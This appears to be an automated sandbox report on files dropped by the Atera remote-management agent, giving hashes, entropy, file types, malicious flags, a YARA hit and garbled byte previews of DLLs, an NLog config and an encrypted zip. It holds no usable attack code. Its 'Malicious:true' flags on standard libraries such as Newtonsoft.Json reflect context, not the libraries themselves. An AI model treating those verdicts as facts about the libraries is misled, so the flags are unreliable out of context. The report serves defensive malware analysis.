                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                        MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                        SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                        SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                        SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`.......w....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                        MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                        SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                        SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                        SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ...................................`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                        MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                        SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                        SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                        SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1409
                                                                                                                                                                                                                                        Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                        MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                        SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                        SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                        SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                        MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                        SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                        SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                        SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................;....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                        MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                        SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                        SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                        SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                        MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                        SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                        SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                        SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                        MD5:35082EAB5825C9A9D021B5B97BE382B2
                                                                                                                                                                                                                                        SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                        SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                        SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97328
                                                                                                                                                                                                                                        Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                        MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                        SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                        SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                        SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................P.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                        MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                        SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                        SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                        SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`......\.....@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                        MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                        SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                        SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                        SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):342865
                                                                                                                                                                                                                                        Entropy (8bit):7.9992844075056935
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:9nQP7HqdkykjdqfvImDTIVfygNymRsl8aejvq13W/V191OQB6MBsUUnf7spSg+V1:9nQP7Hqdk/pqo0IVfb5na9Z619MQBxu9
                                                                                                                                                                                                                                        MD5:B3E14504A48BED32C53EC7AAB2CB2C8F
                                                                                                                                                                                                                                        SHA1:0BC0D486A5ED1C4CDF2390229883ED3473926882
                                                                                                                                                                                                                                        SHA-256:ADEA6001759B5604F60BBAEC8CE536A1E189ADEBC7394F9CFF3921CAE40C8C9B
                                                                                                                                                                                                                                        SHA-512:E5A5C09355EB9CB45DC872B59EDBD54F62F15445CA6CAAA3187E31E7928EF4453AE8405D9EEE5D2AEC4FA34965D3006DCF61C060B8691519A2312382612C683F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......i/Y.h.9........-...AgentPackageSTRemote/AgentPackageSTRemote.exe....0".......p.......(.|Le....r....W..........'.-._.{.a.b..-....6u.#."'+.u.9...B..n.....>!(.Tzs4a.g?.....{...J}...v..?.Q...........0.P..m.....2^...X..}k.....VU.HY.*.sZ..Y$H..j.g..p#...9..f/*.8...(...w...a.&B.`.bV/g{.....0.QRH.J.E.c.m.}!..T...N..74.r.*J...u,....\7...o...~.....>`X;.2i..g.7.^0..R0[P..."..7..t.d.........!#.}t..G.%7"p.jnG....(..Rg.K9..Z.#...w.4.351.......-.....v&.t.g?I.pA_.J..`..p,.....4G..h.D....d.:s..H..c....l-y\i.@.....lr.$..LC..._.<W.>.(..0B..rz...... V......v.{"........=..zSqA5.-..2...!.>..rB5g.....Tq.....!8\.S#.K.N.l[...L..|...i2..3pp..2'...Cx.@.<..q.\.<..J....&.\.X....mk...ic.....F.@r..^.^e.?....l#.9..Q..g..7a|2.@.g.h..:....|8...{[..N)~...6..i#.q..F5W.dK<.C..Wm..[KPI.......h.x..SO..m......6..*.........G.TS..p.Z.@..dx.N...\...OmO.Ho.l.^.#6.8.:eM4`...).yU....W....C.]......f.2....:...m;r..;...[...:D()2"....Q!S..ik5.../t.V..:s..f.a.V...}ou..o...j....b.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):74288
                                                                                                                                                                                                                                        Entropy (8bit):5.498724993681897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:y5TTyapvW7AM3ushkm7Xv2piJQ+VASa0oJoU0BaaOP/7HxZoU:yU48q230au/9
                                                                                                                                                                                                                                        MD5:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                        SHA1:BBA9A471E9300BCD4EBE3359D3F73B53067B781D
                                                                                                                                                                                                                                        SHA-256:C176F54367F9DE7272B24FD4173271FD00E26C2DBDBF944B42D7673A295A65E6
                                                                                                                                                                                                                                        SHA-512:F0A5059B326446A7BD8F4C5B1BA5858D1AFFDC48603F6CE36355DAEAAB4ED3D1E853359A2440C69C5DEE3D47E84F7BF38D7ADF8707C277CD056F6EBCA5942CC5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0.............z.... ... ....@.. .......................`............`.................................(...O.... ..P...............0(...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B................\.......H........D..4............................................................0..........(....9....(....~9...%-.&~8.....}...s....%.9...(...+~:...%-.&~8.....~...s....%.:...(...+~;...%-.&~8.........s....%.;...(...+~<...%-.&~8.........s....%.<...(...+*.*..(....*...0..-.......(.....3..*r...pr...p(....,.(......(....+..._*....0..(........(......~....(....,..*..(....~....(....*.0.......... ....(......i./.*...............&.........7...%.. ..o.......r9..p( ...,.*......s!.....s!............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
